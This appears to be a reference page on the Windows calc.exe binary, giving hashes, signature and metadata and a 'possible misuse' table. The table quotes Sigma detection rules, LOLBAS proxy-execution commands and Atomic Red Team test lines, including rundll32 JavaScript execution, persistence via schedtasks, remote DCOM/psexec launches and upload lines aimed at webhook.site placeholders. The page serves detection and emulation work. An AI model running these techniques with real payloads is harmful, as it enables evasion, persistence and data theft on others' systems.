calc.exe

  • File Path: C:\WINDOWS\system32\calc.exe
  • Description: Windows Calculator

Hashes

Type Hash
MD5 CAA5DA86744BF7FF31E445ADAC00DA1C
SHA1 48874FADB5D5D833146647CFF956D15665EFC4A0
SHA256 F2550CCD41FEAC674BE7A869DC6F69AB32A8D13D3FA5EFF00D76105CC7451C78
SHA384 BB0FF654E72D8A407B76414C1A851793688D8A51328CADEC57096A6985DDDF5488DD558AA7930BA75F489CB05F033B21
SHA512 0791D8B3147FCCF7389620A2553EC139AAD5C0B3AD95741D3D5E7EDBEEB07E63E8CCBE5AA75A69AC73AA296C39224D22E6862CFA6F9E368EFB0F20BD5B3C699D
SSDEEP 384:us9f3sy43zHG4Y7eWSqYWniiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiLiiiiir9:v3shzq7pK
IMP 8EEAA9499666119D13B3F44ECD77A729
PESHA1 E7A130F0B0C0C025AEDD507559CCB860280D6CD0
PE256 39A56F6D4163A7749A27E33B5FDE5B2089DFC7AFB716D4B05B0584B6C82F7CFC

Runtime Data

Loaded Modules:

Path
C:\WINDOWS\system32\calc.exe
C:\WINDOWS\System32\KERNEL32.DLL
C:\WINDOWS\System32\KERNELBASE.dll
C:\WINDOWS\SYSTEM32\ntdll.dll

Signature

  • Status: Signature verified.
  • Serial: 33000002ED2C45E4C145CF48440000000002ED
  • Thumbprint: 312860D2047EB81F8F58C29FF19ECDB4C634CF6A
  • Issuer: CN=Microsoft Windows Production PCA 2011, O=Microsoft Corporation, L=Redmond, S=Washington, C=US
  • Subject: CN=Microsoft Windows, O=Microsoft Corporation, L=Redmond, S=Washington, C=US

File Metadata

  • Original Filename: CALC.EXE
  • Product Name: Microsoft Windows Operating System
  • Company Name: Microsoft Corporation
  • File Version: 10.0.22000.51 (WinBuild.160101.0800)
  • Product Version: 10.0.22000.51
  • Language: English (United States)
  • Legal Copyright: Microsoft Corporation. All rights reserved.
  • Machine Type: 64-bit

File Scan

  • VirusTotal Detections: 0/71
  • VirusTotal Link: https://www.virustotal.com/gui/file/f2550ccd41feac674be7a869dc6f69ab32a8d13d3fa5eff00d76105cc7451c78/detection

File Similarity (ssdeep match)

File Score
C:\Windows\system32\calc.exe 41
C:\WINDOWS\system32\calc.exe 49
C:\WINDOWS\SysWOW64\calc.exe 46
C:\Windows\SysWOW64\calc.exe 46
C:\Windows\SysWOW64\calc.exe 50
C:\WINDOWS\SysWOW64\calc.exe 49

Possible Misuse

The following table contains possible examples of calc.exe being misused. While calc.exe is not inherently malicious, its legitimate functionality can be abused for malicious purposes.

Source Source File Example License
sigma proc_creation_win_susp_calc.yml description: Detects suspicious use of calc.exe with command line parameters or in a suspicious directory, which is likely caused by some PoC or detection evasion DRL 1.0
sigma proc_creation_win_susp_calc.yml CommandLine\|contains: '\calc.exe ' DRL 1.0
sigma proc_creation_win_susp_calc.yml Image\|endswith: '\calc.exe' DRL 1.0
sigma proc_creation_win_susp_rundll32_setupapi_installhinfsection.yml - https://gist.githubusercontent.com/bohops/0cc6586f205f3691e04a1ebf1806aabd/raw/baf7b29891bb91e76198e30889fbf7d6642e8974/calc_exe.inf DRL 1.0
sigma proc_creation_win_susp_system_user_anomaly.yml - '\calc.exe' DRL 1.0
LOLBAS Explorer.yml - Command: explorer.exe calc.exe  
LOLBAS Explorer.yml Description: 'Executes calc.exe as a subprocess of explorer.exe.'  
LOLBAS Gpup.yml - Command: Gpup.exe -w whatever -e c:\Windows\System32\calc.exe  
LOLBAS Nvudisp.yml - Command: Nvudisp.exe System calc.exe  
LOLBAS Nvudisp.yml Description: Execute calc.exe as a subprocess.  
LOLBAS Nvudisp.yml - Command: Nvudisp.exe CreateShortcut test.lnk,"Test","c:\windows\system32\calc.exe\","","c:\windows\system32\"  
LOLBAS Nvuhda6.yml - Command: nvuhda6.exe System calc.exe  
LOLBAS Nvuhda6.yml Description: Execute calc.exe as a subprocess.  
LOLBAS Nvuhda6.yml - Command: nvuhda6.exe CreateShortcut test.lnk,"Test","C:\Windows\System32\calc.exe","","C:\Windows\System32\"  
LOLBAS Nvuhda6.yml - Command: nvuhda6.exe KillApp calc.exe  
LOLBAS Usbinst.yml Description: Execute calc.exe through DefaultInstall Section Directive in INF file.  
LOLBAS Bash.yml - Command: bash.exe -c calc.exe  
LOLBAS Bash.yml Description: Executes calc.exe from bash.exe  
LOLBAS ConfigSecurityPolicy.yml - Command: ConfigSecurityPolicy.exe C:\\Windows\\System32\\calc.exe https://webhook.site/xxxxxxxxx?encodedfile  
LOLBAS DataSvcUtil.yml - Command: DataSvcUtil /out:C:\\Windows\\System32\\calc.exe /uri:https://webhook.site/xxxxxxxxx?encodedfile  
LOLBAS Diskshadow.yml - Command: diskshadow> exec calc.exe  
LOLBAS Explorer.yml - Command: explorer.exe /root,"C:\Windows\System32\calc.exe"  
LOLBAS Explorer.yml Description: Execute calc.exe with the parent process spawning from a new instance of explorer.exe  
LOLBAS Extrac32.yml - Command: extrac32.exe /C C:\Windows\System32\calc.exe C:\Users\user\Desktop\calc.exe  
LOLBAS Extrac32.yml Description: Command for copying calc.exe to another folder  
LOLBAS Forfiles.yml - Command: forfiles /p c:\windows\system32 /m notepad.exe /c calc.exe  
LOLBAS Forfiles.yml Description: Executes calc.exe since there is a match for notepad.exe in the c:\windows\System32 folder.  
LOLBAS Ftp.yml - Command: echo !calc.exe > ftpcommands.txt && ftp -s:ftpcommands.txt  
LOLBAS Hh.yml - Command: HH.exe c:\windows\system32\calc.exe  
LOLBAS Hh.yml Description: Executes calc.exe with HTML Help.  
LOLBAS Pcalua.yml - Command: pcalua.exe -a calc.exe  
LOLBAS Rundll32.yml Description: Use Rundll32.exe to execute a JavaScript script that runs calc.exe.  
LOLBAS Rundll32.yml - Command: rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();h=new%20ActiveXObject("WScript.Shell").run("calc.exe",0,true);try{h.Send();b=h.ResponseText;eval(b);}catch(e){new%20ActiveXObject("WScript.Shell").Run("cmd /c taskkill /f /im rundll32.exe",0,true);}  
LOLBAS Rundll32.yml Description: Use Rundll32.exe to execute a JavaScript script that runs calc.exe and then kills the Rundll32.exe process that was started.  
LOLBAS Scriptrunner.yml - Command: Scriptrunner.exe -appvscript calc.exe  
LOLBAS Scriptrunner.yml Description: Executes calc.exe  
LOLBAS Ttdinject.yml - Command: TTDInject.exe /ClientParams "7 tmp.run 0 0 0 0 0 0 0 0 0 0" /Launch "C:/Windows/System32/calc.exe"  
LOLBAS Ttdinject.yml - Command: ttdinject.exe /ClientScenario TTDRecorder /ddload 0 /ClientParams "7 tmp.run 0 0 0 0 0 0 0 0 0 0" /launch "C:/Windows/System32/calc.exe"  
LOLBAS Tttracer.yml - Command: tttracer.exe C:\windows\system32\calc.exe  
LOLBAS Wlrmdr.yml - Command: "wlrmdr.exe -s 3600 -f 0 -t _ -m _ -a 11 -u calc.exe"  
LOLBAS Wlrmdr.yml Description: Execute calc.exe with wlrmdr.exe as parent process  
LOLBAS Advpack.yml - Command: rundll32.exe advpack.dll,RegisterOCX calc.exe  
LOLBAS Advpack.yml - Command: rundll32 advpack.dll, RegisterOCX "cmd.exe /c calc.exe"  
LOLBAS Ieadvpack.yml - Command: rundll32.exe ieadvpack.dll,RegisterOCX calc.exe  
LOLBAS Ieadvpack.yml - Command: rundll32 ieadvpack.dll, RegisterOCX "cmd.exe /c calc.exe"  
LOLBAS Pcwutl.yml - Command: rundll32.exe pcwutl.dll,LaunchApplication calc.exe  
LOLBAS Setupapi.yml - Command: rundll32.exe setupapi.dll,InstallHinfSection DefaultInstall 128 C:\\Tools\\calc_exe.inf  
LOLBAS Setupapi.yml - Code: https://gist.githubusercontent.com/bohops/0cc6586f205f3691e04a1ebf1806aabd/raw/baf7b29891bb91e76198e30889fbf7d6642e8974/calc_exe.inf  
LOLBAS Url.yml - Command: rundll32.exe url.dll,FileProtocolHandler calc.exe  
LOLBAS Zipfldr.yml - Command: rundll32.exe zipfldr.dll,RouteTheCall calc.exe  
LOLBAS Manage-bde.yml - Command: set comspec=c:\windows\system32\calc.exe & cscript c:\windows\system32\manage-bde.wsf  
LOLBAS Appvlp.yml - Command: AppVLP.exe powershell.exe -c "$e=New-Object -ComObject shell.application;$e.ShellExecute('calc.exe','', '', 'open', 1)"  
LOLBAS Sqltoolsps.yml - Command: SQLToolsPS.exe -noprofile -command Start-Process calc.exe  
LOLBAS Vsjitdebugger.yml - Command: Vsjitdebugger.exe calc.exe  
LOLBAS Vsjitdebugger.yml Description: Executes calc.exe as a subprocess of Vsjitdebugger.exe.  
LOLBAS Wsl.yml - Command: wsl.exe -e /mnt/c/Windows/System32/calc.exe  
LOLBAS Wsl.yml Description: Executes calc.exe from wsl.exe  
atomic-red-team problem_report.md e.g. The atomic test executes and calc.exe is launched. MIT License. © 2018 Red Canary
atomic-red-team T1021.003.md Upon successful execution, cmd will spawn calc.exe on a remote computer. MIT License. © 2018 Red Canary
atomic-red-team T1021.003.md [activator]::CreateInstance([type]::GetTypeFromProgID(“MMC20.application”,”#{computer_name}”)).Document.ActiveView.ExecuteShellCommand(“c:\windows\system32\calc.exe”, $null, $null, “7”) MIT License. © 2018 Red Canary
atomic-red-team T1027.004.md | input_file | C# code that launches calc.exe from a hidden cmd.exe Window | Path | PathToAtomicsFolder\T1027.004\src\calc.cs| MIT License. © 2018 Red Canary
atomic-red-team T1036.003.md | exe_path | path to exe to use when creating masquerading files | Path | C:\Windows\System32\calc.exe| MIT License. © 2018 Red Canary
atomic-red-team T1053.005.md schtasks /create /tn “T1053_005_OnLogon” /sc onlogon /tr “cmd.exe /c calc.exe” MIT License. © 2018 Red Canary
atomic-red-team T1053.005.md schtasks /create /tn “T1053_005_OnStartup” /sc onstart /ru system /tr “cmd.exe /c calc.exe” MIT License. © 2018 Red Canary
atomic-red-team T1053.005.md $Action = New-ScheduledTaskAction -Execute “calc.exe” MIT License. © 2018 Red Canary
atomic-red-team T1106.md Execute program by leveraging Win32 API’s. By default, this will launch calc.exe from the command prompt. MIT License. © 2018 Red Canary
atomic-red-team T1112.md | new_executable | New executable to run on startup instead of Windows Defender | String | calc.exe| MIT License. © 2018 Red Canary
atomic-red-team T1134.004.md calc.exe will be launched. MIT License. © 2018 Red Canary
atomic-red-team T1140.md | executable | name of executable | Path | C:\Windows\System32\calc.exe| MIT License. © 2018 Red Canary
atomic-red-team T1140.md | executable | name of executable/file to decode | Path | C:\Windows\System32\calc.exe| MIT License. © 2018 Red Canary
atomic-red-team T1202.md Upon execution, calc.exe should open MIT License. © 2018 Red Canary
atomic-red-team T1202.md | payload_path | Path to payload | Path | C:\Windows\System32\calc.exe| MIT License. © 2018 Red Canary
atomic-red-team T1202.md | process | Process to execute | String | calc.exe| MIT License. © 2018 Red Canary
atomic-red-team T1202.md “This is basically saying for each occurrence of notepad.exe in c:\windows\system32 run calc.exe” MIT License. © 2018 Red Canary
atomic-red-team T1202.md Upon execution calc.exe will be opened. MIT License. © 2018 Red Canary
atomic-red-team T1204.002.md Microsoft Office creating then launching a .bat script from an AppData directory. The .bat file launches calc.exe when opened. MIT License. © 2018 Red Canary
atomic-red-team T1204.002.md $macrocode = “ Open "#{bat_path}” For Output As #1n Write #1, “calc.exe"n Close #1n a = Shell(“cmd.exe /c $bat_path ", vbNormalFocus)n” MIT License. © 2018 Red Canary
atomic-red-team T1204.002.md and pull down the script and execute it. By default the payload will execute calc.exe on the system. MIT License. © 2018 Red Canary
atomic-red-team T1216.md Upon execution, calc.exe will be launched. MIT License. © 2018 Red Canary
atomic-red-team T1216.md | command_to_execute | A command to execute. | Path | %windir%\System32\calc.exe| MIT License. © 2018 Red Canary
atomic-red-team T1218.md | powershell_code | PowerShell code to execute | String | Start-Process calc.exe| MIT License. © 2018 Red Canary
atomic-red-team T1218.md Emulates attack with Microsoft.Workflow.Compiler.exe running a .Net assembly that launches calc.exe MIT License. © 2018 Red Canary
atomic-red-team T1218.md Emulates attack with a renamed Microsoft.Workflow.Compiler.exe running a .Net assembly that launches calc.exe MIT License. © 2018 Red Canary
atomic-red-team T1218.001.md Upon execution calc.exe will open MIT License. © 2018 Red Canary
atomic-red-team T1218.002.md Upon execution calc.exe will be launched MIT License. © 2018 Red Canary
atomic-red-team T1218.005.md Test execution of a remote script using mshta.exe. Upon execution calc.exe will be launched. MIT License. © 2018 Red Canary
atomic-red-team T1218.005.md Execute an arbitrary remote HTA. Upon execution calc.exe will be launched. MIT License. © 2018 Red Canary
atomic-red-team T1218.010.md Regsvr32.exe is a command-line program used to register and unregister OLE controls. Upon execution, calc.exe will be launched. MIT License. © 2018 Red Canary
atomic-red-team T1218.010.md windows defender real-time protection to fix it. Upon execution, calc.exe will be launched. MIT License. © 2018 Red Canary
atomic-red-team T1218.011.md Upon execution calc.exe will be launched MIT License. © 2018 Red Canary
atomic-red-team T1218.011.md | command_to_execute | Command for rundll32.exe to execute | String | calc.exe| MIT License. © 2018 Red Canary
atomic-red-team T1218.011.md Upon successful execution, Calc.exe will spawn. MIT License. © 2018 Red Canary
atomic-red-team T1546.012.md | target_binary | Binary To Attach To | Path | C:\Windows\System32\calc.exe| MIT License. © 2018 Red Canary
atomic-red-team T1546.013.md Appends a start process cmdlet to the current user’s powershell profile pofile that points to a malicious executable. Upon execution, calc.exe will be launched. MIT License. © 2018 Red Canary
atomic-red-team T1546.013.md | exe_path | Path the malicious executable | Path | calc.exe| MIT License. © 2018 Red Canary
atomic-red-team T1547.001.md $Target = “C:\Windows\System32\calc.exe” MIT License. © 2018 Red Canary
atomic-red-team T1547.001.md $ShortcutLocation = “$home\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\calc_exe.lnk” MIT License. © 2018 Red Canary
atomic-red-team T1547.001.md Remove-Item “$home\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\calc_exe.lnk” -ErrorAction Ignore MIT License. © 2018 Red Canary
atomic-red-team T1547.009.md Upon execution, calc.exe will be launched. MIT License. © 2018 Red Canary
atomic-red-team T1547.009.md echo URL=C:\windows\system32\calc.exe » #{shortcut_file_path} MIT License. © 2018 Red Canary
atomic-red-team T1559.002.md {DDEAUTO c:\windows\system32\cmd.exe “/k calc.exe” } MIT License. © 2018 Red Canary
atomic-red-team T1559.002.md 9. DDEAUTO c:\windows\system32\cmd.exe “/k calc.exe” MIT License. © 2018 Red Canary
atomic-red-team T1564.md This module extracts a binary (calc.exe) from inside of another binary. MIT License. © 2018 Red Canary
atomic-red-team T1564.003.md Upon execution a hidden PowerShell window will launch calc.exe MIT License. © 2018 Red Canary
atomic-red-team T1564.003.md | powershell_command | Command to launch calc.exe from a hidden PowerShell Window | String | powershell.exe -WindowStyle hidden calc.exe| MIT License. © 2018 Red Canary
atomic-red-team T1569.002.md Upon successful execution, cmd will utilize psexec.exe to spawn calc.exe on a remote endpoint (default:localhost). MIT License. © 2018 Red Canary
atomic-red-team T1569.002.md #{psexec_exe} \#{remote_host} -u #{user_name} -p #{password} -accepteula “C:\Windows\System32\calc.exe” MIT License. © 2018 Red Canary
atomic-red-team T1574.002.md Upon execution, calc.exe will be opened. MIT License. © 2018 Red Canary
signature-base thor-webshells.yar $s7 = “""%windir%\\calc.exe"")” CC BY-NC 4.0

MIT License. Copyright (c) 2020-2021 Strontic.